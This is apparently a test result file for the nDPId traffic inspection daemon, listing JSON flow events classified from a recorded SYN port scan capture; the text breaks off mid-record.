-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","ndpi": 